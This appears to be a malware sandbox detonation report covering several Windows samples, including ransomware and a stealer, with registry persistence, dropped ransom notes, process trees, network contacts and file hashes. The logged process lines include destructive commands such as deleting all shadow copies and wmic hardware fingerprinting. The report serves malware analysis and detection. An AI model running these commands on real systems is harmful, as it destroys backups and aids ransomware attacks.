Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\bgckojpgggmcgnt = "C:\\ProgramData\\sungxqekykzeawigkuxf.exe" C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\bgckojpgggmcgnt = "C:\\ProgramData\\sungxqekykzeawigkuxf.exe" C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\bgckojpgggmcgnt = "C:\\Windows\\sungxqekykzeawigkuxf.exe" C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\bgckojpgggmcgnt = "C:\\Windows\\sungxqekykzeawigkuxf.exe" C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\sungxqekykzeawigkuxf.exe C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A
File opened for modification C:\Windows\sungxqekykzeawigkuxf.exe C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe

"C:\Users\Admin\AppData\Local\Temp\e0ff79cc943f489668067ec3be11398a084a76ecd0283c9e18b2d0bf6e464c32_not_packed_maybe_useless.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 trybesmart.in udp

Files

C:\ProgramData\dhqiiylrjiashxnahpkvmwffwzdhxjak

MD5 5643e2590826d85cd09f97dd6a8ec012
SHA1 9424646c927693cc2d8b2d3ac21622f015fe1ed2
SHA256 fc9fbae8e11bd7c664a3a4203303fe43125e72db0d7c8d68d36a244e3293066d
SHA512 3ee054843470d3bb0b330d4b4dd07996195da1cbb131eec2125c2dbd6ab6576c2bf202af279c6432a4cfb2d3c623af7ce5205c567c94d096c1828068c31fe7d6

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20241010-en

Max time kernel

314s

Max time network

320s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\eaa857c95fca38ca08411b757f4ad2a841cfb9782deca8abf64aada445923c0d_Stealer.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\eaa857c95fca38ca08411b757f4ad2a841cfb9782deca8abf64aada445923c0d_Stealer.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20240903-en

Max time kernel

599s

Max time network

600s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Reads user/profile data of web browsers

spyware stealer

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\vssadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1076 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1076 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1076 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1076 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1076 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1076 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1076 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1076 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1532 wrote to memory of 1168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1532 wrote to memory of 1168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1532 wrote to memory of 1168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1532 wrote to memory of 1168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 2408 wrote to memory of 1424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2408 wrote to memory of 1424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2408 wrote to memory of 1424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2408 wrote to memory of 1424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2408 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2408 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2408 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2408 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1076 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1076 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1076 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1076 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 2732 wrote to memory of 2900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2732 wrote to memory of 2900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2732 wrote to memory of 2900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2732 wrote to memory of 2900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2732 wrote to memory of 2928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2732 wrote to memory of 2928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2732 wrote to memory of 2928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2732 wrote to memory of 2928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1076 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1076 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1076 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1076 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 2636 wrote to memory of 2744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2636 wrote to memory of 2744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2636 wrote to memory of 2744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2636 wrote to memory of 2744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2636 wrote to memory of 2780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2636 wrote to memory of 2780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2636 wrote to memory of 2780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2636 wrote to memory of 2780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1076 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1076 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1076 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1076 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe C:\Windows\SysWOW64\cmd.exe
PID 1496 wrote to memory of 2040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1496 wrote to memory of 2040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1496 wrote to memory of 2040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1496 wrote to memory of 2040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1496 wrote to memory of 2144 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1496 wrote to memory of 2144 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1496 wrote to memory of 2144 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1496 wrote to memory of 2144 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1496 wrote to memory of 448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1496 wrote to memory of 448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1496 wrote to memory of 448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1496 wrote to memory of 448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1496 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1496 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1496 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1496 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe

"C:\Users\Admin\AppData\Local\Temp\ed3a685ca65de70b79faf95bbd94c343e73a150e83184f67e0bdb35b11d05791.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet && exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C wmic logicaldisk where drivetype=2 get deviceid | findstr . > %tmp%\y

C:\Windows\SysWOW64\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic logicaldisk where drivetype=2 get deviceid

C:\Windows\SysWOW64\findstr.exe

findstr .

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C wmic logicaldisk where drivetype=3 get deviceid | findstr . > %tmp%\y

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic logicaldisk where drivetype=3 get deviceid

C:\Windows\SysWOW64\findstr.exe

findstr .

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C wmic logicaldisk where drivetype=4 get deviceid | findstr . > %tmp%\y

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic logicaldisk where drivetype=4 get deviceid

C:\Windows\SysWOW64\findstr.exe

findstr .

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C wmic path win32_physicalmedia get SerialNumber | findstr . > %tmp%\y && wmic cpu get ProcessorId | findstr . >> %tmp%\y && wmic path win32_BASEBOARD get Product | findstr . >> %tmp%\y

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic path win32_physicalmedia get SerialNumber

C:\Windows\SysWOW64\findstr.exe

findstr .

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic cpu get ProcessorId

C:\Windows\SysWOW64\findstr.exe

findstr .

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic path win32_BASEBOARD get Product

C:\Windows\SysWOW64\findstr.exe

findstr .

Network

Country Destination Domain Proto
US 8.8.8.8:53 torproject.ip-connect.vn.ua udp
UA 91.236.251.35:80 torproject.ip-connect.vn.ua tcp
US 8.8.8.8:53 torproject.ip-connect.vn.ua udp
UA 91.236.251.35:80 torproject.ip-connect.vn.ua tcp
UA 91.236.251.35:80 torproject.ip-connect.vn.ua tcp
UA 91.236.251.35:80 torproject.ip-connect.vn.ua tcp
UA 91.236.251.35:80 torproject.ip-connect.vn.ua tcp
UA 91.236.251.35:80 torproject.ip-connect.vn.ua tcp

Files

C:\Users\Admin\AppData\Local\Temp\y

MD5 730a1c06f8273df68828bbebb3e1fab0
SHA1 1c269bdd515ca992df2c07c2b4c0eda26f1a6c91
SHA256 da51411ba8d69f112382c4ada4c02ad9e5ab3fcececca4bd50bb11122e473679
SHA512 1d56e0d3704d75dff9f20347ff3e712c114a1d9e5383e6356a71a9705dd4a3bb311c174c6d026cc60707abc56f7bfda011293a8dbd7f79a299fb712d3ad33f30

C:\Users\Admin\AppData\Local\Temp\y

MD5 445e94a8ece8238758d3a897fef6822b
SHA1 2c5e5cb3ce480d98d74fe5a0ed23d31848ebb407
SHA256 543e763d191bc04c5564cf6521eeff6c154b74415575303c72b46f32bd24594b
SHA512 c6347eb9214eab5b8e2f61358153244203480c11d4d83f83e1e37cdd3f922a6e50c5568618fb27cb2a70487d7b9bea44614a065631934fca5894a6daec1f82a6

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20240903-en

Max time kernel

359s

Max time network

361s

Command Line

"C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\drivers\gmreadme.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\drivers\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\69srkdAG47tGigR4 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe\" /SkipReg" C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_modules.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_neutral_7a5f47d3150cc0eb\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\eval\HomeBasicE\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\ksfilter.inf_amd64_neutral_86311fdf78a07678\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
